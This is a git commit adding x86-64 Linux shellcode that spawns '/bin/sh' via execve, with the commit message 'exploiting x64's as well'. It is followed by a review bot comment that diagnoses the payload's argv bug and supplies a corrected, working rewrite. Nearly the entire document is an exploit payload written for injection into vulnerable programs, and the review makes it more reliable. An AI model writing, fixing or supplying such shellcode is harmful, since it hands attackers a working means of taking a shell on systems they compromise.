From bd18cd8c67fd97f6bf0dceffae68799730ec582c Mon Sep 17 00:00:00 2001
From: toni
Date: Sun, 12 Apr 2015 17:21:18 +0200
Subject: exploiting x64's as well

---
 shellcode/execve_x64.asm | 20 ++++++++++++++++++++
 1 file changed, 20 insertions(+)
 create mode 100644 shellcode/execve_x64.asm

(limited to 'shellcode/execve_x64.asm')

diff --git a/shellcode/execve_x64.asm b/shellcode/execve_x64.asm
new file mode 100644
index 0000000..6048796
--- /dev/null
+++ b/shellcode/execve_x64.asm
@@ -0,0 +1,20 @@
+BITS 64
+
+
+; do the 'string trick'
+jmp short string
+
+code:
+xor rax,rax
+pop rdi ; pop the addr of the string intro esi (stack pointer register)
+mov byte [rdi + 7], al ; null-terminate the string
+push rdi
+mov rsi,rsp
+push rax
+mov rdx,rsp
+mov byte al,59 ; execv
+syscall
+
+string:
+call code
+db '/bin/sh' , 0xFF
-- cgit v1.2.3
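Review bot: The argv array handed to execve is not NULL-terminated: `push rdi` followed by `mov rsi,rsp` makes rsi point at the string address and then at whatever the caller left on the stack at entry, and the later `push rax` only terminates envp, so depending on that stack garbage the syscall fails with EFAULT or sh receives a junk argv[1]. Pushing the NULL before the pointer fixes both arrays, as in the rewrite below. Two comments also mislead a reader: `pop rdi` does not touch esi and rdi is not the stack pointer (it becomes the execve pathname argument), and syscall 59 on x86-64 Linux is execve, not execv; `mov byte al,59` is just `mov al,59`. Since `mov byte [rdi + 7], al` patches the string in place, the shellcode only works when the buffer it runs from is writable, which is worth a one-line comment at the top of the file, e.g. `; self-patching: needs a writable buffer (stack/heap), not an RX mapping`.
```asm
code:
xor eax, eax                ; rax = 0 (32-bit form, no REX byte)
pop rdi                     ; rdi = &"/bin/sh" (pushed by `call code`)
mov byte [rdi + 7], al      ; overwrite the 0xFF placeholder with NUL (buffer must be writable)
push rax                    ; NULL
mov rdx, rsp                ; envp = { NULL }
push rdi                    ; argv[0] = "/bin/sh"
mov rsi, rsp                ; argv = { "/bin/sh", NULL }
mov al, 59                  ; SYS_execve on x86-64 Linux
syscall
; ... unchanged: jmp short string / string: call code / db '/bin/sh', 0xFF ...
```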